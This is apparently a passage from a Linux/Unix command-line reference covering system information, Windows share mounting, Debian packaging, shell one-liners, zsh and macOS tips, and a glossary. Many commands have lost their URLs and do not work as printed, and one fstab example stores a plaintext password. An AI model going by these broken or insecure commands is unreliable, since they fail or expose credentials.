prints 3:34pm up 4:31, 4 users, load average: 0.01, 0.05, 0.07

output a list of times when the system was rebooted

 last reboot

output the name of the operating system


output the release number of the operating system

 uname -r

output the CPU processor type of the system

 uname -m

output all of the uname information for the system you are on,

 uname -a

output the release name of the Debian system you are on

 cat /etc/debian_version

Debian releases have historically been named after characters from the motion picture Toy Story.

Microsoft Windows ‹↑›

Change Windows Domain password from Linux

 smbpasswd -r <domain-server> -U <user name>

Use Cygwin to talk to the Windows clipboard

 cat /dev/clipboard; $(somecommand) > /dev/clipboard

Mount a Windows shared folder on the local network (Ubuntu) with user

 sudo mount -t cifs -o user,username="samba username"

automount samba shares as devices in /mnt/

 sudo vi /etc/fstab; Go//smb-share/gino /mnt/place smbfs defaults,username=gino,password=pass 0 0<esc>:wq; mount //smb-share/gino

mount a windows partition

    sudo mkdir /media/nt/
    sudo fdisk -l   # find out where is the nt partition
    sudo mount -t ntfs -o nls=utf8,umask=0222 /dev/hdb1 /media/nt



 The following is a procedure for creating a debian package.

  * create a 'debian/usr/bin' folder and copy the executable there
  >> mkdir -p ./debian/usr/bin; cp someprogram ./debian/usr/bin
  * create a man page for the program
  >> vim someprogram.1
   ##(this is an optional step)
  * create a man page folder and copy the man page there,
  >> mkdir -p ./debian/usr/share/man/man1
  >> cp ./man/man1/someprogram.1 ./debian/usr/share/man/man1

  * compress the man page with gzip (an option step)

  * create a copyright file to include in the package
  >> find /usr/share/doc -name "copyright" ##(see examples of copyright files)

  * create a folder for the copyright file and copy the file there
  >> mkdir -p ./debian/usr/share/doc/someprogram; ... 
  >> cp ./copyright ./debian/usr/share/doc/someprogram

  * find out the dependencies of all programs which your program uses
  >> dkpg -S /bin/cat ##(this will display 'coreutils: /bin/cat)
  * find out the version numbers of dependencies
  >> apt-cache showpkg coreutils
   ##(this information is needed for the 'Dependencies' field of the control file)

   make a control file..

     Package: someprogram 
     Version: 1.1-1
     Section: base
     Priority: optional
     Architecture: all
     Depends: bash (>= 2.05a-11), textutils (>= 2.0-12), awk, procps (>= \
     1:2.0.7-8), sed (>= 3.02-8), grep (>= 2.4.2-3), coreutils (>= 5.0-5)
     Maintainer: James Tree <>
     Description: parses a text stream 
      This script parses a text stream using a stack virtual machine 

copy the control file to the 'DEBIAN' folder

 mkdir -p debian/DEBIAN; cp control debian/DEBIAN
on some debians: find ./debian -type d | xargs chmod 755

make a change log file (an optional step)

     xlinuxstatus (1.2-1)
  * Made Debian package lintian clean.
      -- James Tree <>  2002-12-13

make a changelog.Debian file (optional)

   linuxstatus Debian maintainer and upstream author are identical.
   Therefore see also normal changelog file for Debian changes.

create and rename the package file

 dpkg-deb --build debian; mv debian.deb someprogram_1.1-1_all.deb
or build as root 'fakeroot dpkg-deb --build debian'

install the newly created package

 dpkg -i ./someprogram_1.1-1_all.deb

remove the installed package

 dpkg -r someprogram


Unix Program Naming ‹↑›

The names for Unix programs appear cryptic and seem to have no relation to their function. However there is usually an explanation for the name. Unix commands are traditionally very short to save typing.

 curl -s | awk ' BEGIN { x=0; FS = "<" } { if ($0~"^<br/>") {x=0} if (x==1) {print $1} if ($0~"EUR/US") {x=1} }'

Curiosities ‹↑›

A death cow thinking in your fortune cookie

 fortune -s -c -a | cowthink -d -W 45

Find the cover image for an album

 albumart(){ local y="$@";awk '/View larger image/{gsub(/^.*largeImagePopup\(.|., .*$/,"");print;exit}' <(curl -s ''${y// /+}'&itempage=1&newsearch=1&searchindex=Music');}

random xkcd comic

 display "$(wget -q -O - | grep -Po '(?<=")[^"]+(png|jpg)')"

Auto Rotate Cube (compiz)

 wmctrl -o 2560,0 ;sleep 2 ; echo "FIRE 001" | osd_cat -o 470 -s 8 -c red -d 10 -f -*-bitstream\ vera\ sans-*-*-*--250-*-*-*-*-*-*-* ; sleep 1; wmctrl -o 0,0

Matrix Style

 LC_ALL=C tr -c "[:digit:]" " " < /dev/urandom | dd cbs=$COLUMNS conv=unblock | GREP_COLOR="1;32" grep --color "[^ ]"

read the useless use of cat awards page


dolphins on the desktop (compiz)

 xwinwrap -ni -argb -fs -s -st -sp -nf -b -- /usr/libexec/xscreensaver/atlantis -count 20 -window-id WID &

for all who don't have the watch command

 watch() { while test :; do clear; date=$(date); echo -e "Every "$1"s: $2 \t\t\t\t $date"; $2; sleep $1; done }

Get Futurama quotations from servers

 echo -e "HEAD / HTTP/1.1\nHost:\n\n" | nc 80 | egrep "Bender|Fry" | sed "s/X-//"

View the newest xkcd comic.

 xkcd(){ local f=$(curl -s;display $(echo "$f"|grep -Po '(?<=")[^"]+(png|jpg)');echo "$f"|awk '/<img src="http:\/\/imgs\.xkcd\.com\/comics\/.*?" title=.*/{gsub(/^.*title=.|".*?$/,"");print}';}

The absolutely fastest nth fibonacci number

 time echo 'n=70332;m=(n+1)/2;a=0;b=1;i=0;while(m){e[i++]=m%2;m/=2};while(i--){c=a *a;a=c+2*a*b;b=c+b*b;if(e[i]){t=a;a+=b;b=t}};if(n%2)a*a+b*b;if(!n%2)a*( a+2*b)' | bc

The 1 millionth fibonacci number

 time echo 'n=1000000;m=(n+1)/2;a=0;b=1;i=0;while(m){e[i++]=m%2;m/=2};while(i--){c =a*a;a=c+2*a*b;b=c+b*b;if(e[i]){t=a;a+=b;b=t}};if(n%2)a*a+b*b;if(!n%2)a *(a+2*b)' | bc

Another Matrix Style Implementation

 echo -ne "\e[32m" ; while true ; do echo -ne "\e[$(($RANDOM % 2 + 1))m" ; tr -c "[:print:]" " " < /dev/urandom | dd count=1 bs=50 2> /dev/null ; done

useless load

 cat /dev/urandom | gzip -9 > /dev/null &

Gets a random Futurama quote from /.

 curl -Is | egrep '^X-(F|B|L)' | cut -d \- -f 2

Get Futurama quotations from servers

 lynx -head -dump|egrep 'Bender|Fry'|sed 's/X-//'

put nothing nowhere

 cat /dev/zero > /dev/null &

Random line from (funny IRC quotes)

 curl -s

decode html entities with perl

 perl -ne 'use HTML::Entities;print decode_entities($_),"\n"'

Zsh ‹↑›

Get length of array in zsh


List the top ten commands you use for the 'zsh' shell

 perl -pe 's/.+;//' ~/.zsh_history | sort | uniq -c | sort -r|head -10

ZSH prompt. ':)' after program execution with no error, ':(' after

 PROMPT=$'%{\e[0;32m%}%B[%b%{\e[0m%}%n%{\e[0;32m%}@%{\e[0m%}%(4c,./%1~,% ~)%{\e[0;32m%}%B]%b% %(?,%{\e[0;32m%}:%)%{\e[0m%},%{\e[0;31m%}:(%{\e[0m%}) %# '

Show every subdirectory (zsh)

 ls -ld **/*(/)

Delete empty directories with zsh

 rm -d **/*(/^F)

Postpone a command [zsh]


zsh only: access a file when you don't know the path, if it is in

 file =top

Mac Osx ‹↑›

This book focusses more on Linux but here is a little information about OSX

Enable Hibernate in OS X

 sudo pmset -a hibernatemode 1

On Mac OS X, runs System Profiler Report and e-mails it to

 system_profiler | mail -s "$HOSTNAME System Profiler Report"

Paste OS X clipboard contents to a file on a remote machine

 pbpaste | ssh user@hostname 'cat > ~/my_new_file.txt'

Throttling Bandwidth On A Mac

 sudo ipfw pipe 1 config bw 50KByte/s;sudo ipfw add 1 pipe 1 src-port 80

OSX command to take badly formatted xml from the clipboard, cleans

 pbpaste | tidy -xml -wrap 0 | pbcopy

Paste the contents of OS X clipboard into a new text file

 pbpaste > newfile.txt

Zip a directory on Mac OS X and ignore .DS_Store (meta-data)

 zip -vr example/ -x "*.DS_Store"

Open up a man page as PDF (#OSX)

 function man2pdf(){ man -t ${1:?Specify man as arg} | open -f -a preview; }

a good macosx command line site
on a bsd system view information about the folder structure
 man hier

Newsreaders ‹↑›

www: slrn
www: pan
graphical, good
www: gnus
within emacs
www: thunderbird
www: xpn
www: knode
the kde app

File Usage ‹↑›

www: filelight
shows disk usage in a graphical manner
www: gadmin-rsync
a gui wrapper for rsync with ssh, scp etc

Terminals ‹↑›

www: slugterm
light weight terminal for small linuxes
remote desktop for sys admins

Graphs ‹↑›

A simple pie chart in 'gnuplot' (and with a 3d thickness)

mind mapping charting software

Wiki ‹↑›

www: docuwiki
a wiki with no database backend

Music ‹↑›

www: amarok
www: songbird
music playlist software
www: frescobaldi
create musical scores from a text input file. gui application

Gps ‹↑›

www: gpx
an xml format for storing gps data
www: prune
a tool for manipulating gps data

Art ‹↑›

www: synfig
studio a program to create animations using stick figures, paths etc.
www: blender
3d animations
a tool for creating traditional drawn animation
an open source animation (anime)

Games ‹↑›

education games. a spelling pacman, flashcards etc 'childsplay'
www: pyspace
war an asteroid shootem up

Game Engines ‹↑›

www: pygame
www: sdl
an open source game engine, written in c++, with bindings for other languages

Geneology ‹↑›

www: gramps
gui geneology builder

Blog Engines ‹↑›

www: bilboblog
a simple blog engine
www: lifeograph
simple diary application

Jargon ‹↑›

www: easter
egg Is an unexpected function hidden in a piece of software
www: Unix-style
operating system, This is an operating system which is somewhat 'unix-like' an included Apple OSX, Linux, FreeBSD, etc
www: Linux
flavour, Linux Distribution Linux comes in a number of different distributions, such as Debian, Fedora, and Ubuntu to name only some of many.
www: regular
expression A search pattern
www: recursive
Recursive means to do an action for some object, and then repeat the same action for all objects which that object contains.
www: concatenate
join together two or more things. For example join together 2 files with 'cat a.txt b.txt > c.txt'
www: command
www: shell
A shell is a piece of software which allows you to communicate with the computer by typing (rather cryptic) commands, and watching the output of those commands. This book focusses on the 'Bash' shell, which is probably the most popular shell on Unix, Linux and Apple OsX.
www: terminal
The terminal is a piece of software which allows you to use the 'shell'. Examples are 'Konsole' for KDE
www: program
A program is really just a piece of software which does something on the computer.
www: parse,
parsing parsing is the process of analysing and splitting into its structure a text pattern. This is a very important task on all computer systems, since a great deal of data processing involves the parsing of one text pattern, and then the transformation of that pattern into another format.
www: thread
www: daemon
www: process
These are similar but important concepts
Some Unix names explained
unix a pun on the <mul>tics operating system
linux <linu>s torvalds version of the uni<x> operating system
cat con<cat>enate files, display all mentioned files
less is a successor to the 'more' program, a file page
sed <s>tream <ed>itor
grep <g>lobal <r>egular <e>x<p>ression search,
ed <ed>itor
vi <vi>sual editor
vim <v>isual editor <im>proved
emacs <e>diting <mac>ro<s>
wc <w>ord <c>ount
tar write to a <t>ape <ar>chive
ls <l>i<s>t files,
troff <t>ypesetting <r>un <off> system, formats documents
groff <g>nu version of the <r>un <off> system
perl <p>ractical <e>xtraction and <r>reporting <l>anguage
awk text processing language by <A>ho, <W>einberger, and <K>ernighan
cd <c>hange <d>irectory
gcc <g>nu <c> <c>ompiler
wget <w>eb <get>ter
curl <c>apture <url>
scp <s>ecure <c>opy <p>rogram
www: pretty-print
This refers to the process of preparing some piece of text automatically in some way which is pleasing to read once printed on a piece of paper or on a computer screen. The term is ambiguous since it can refer to the application of colour to a text file or to the changing and formatting of indentation and paragraph width

Notes And Ideas ‹↑›

This section should contain references to things which I think would be worthwhile investigating but which I havent and may well never get round to doing.

grsync. gimp thresholds. sea horse for encrypt

vnc and vino for remote control Tweetdeck, bluefish, dropbox, dialog, gdialog,

xxd - hexdumps


Organisation ‹↑›

printing jargon


zim - note taker
tomboy - note taker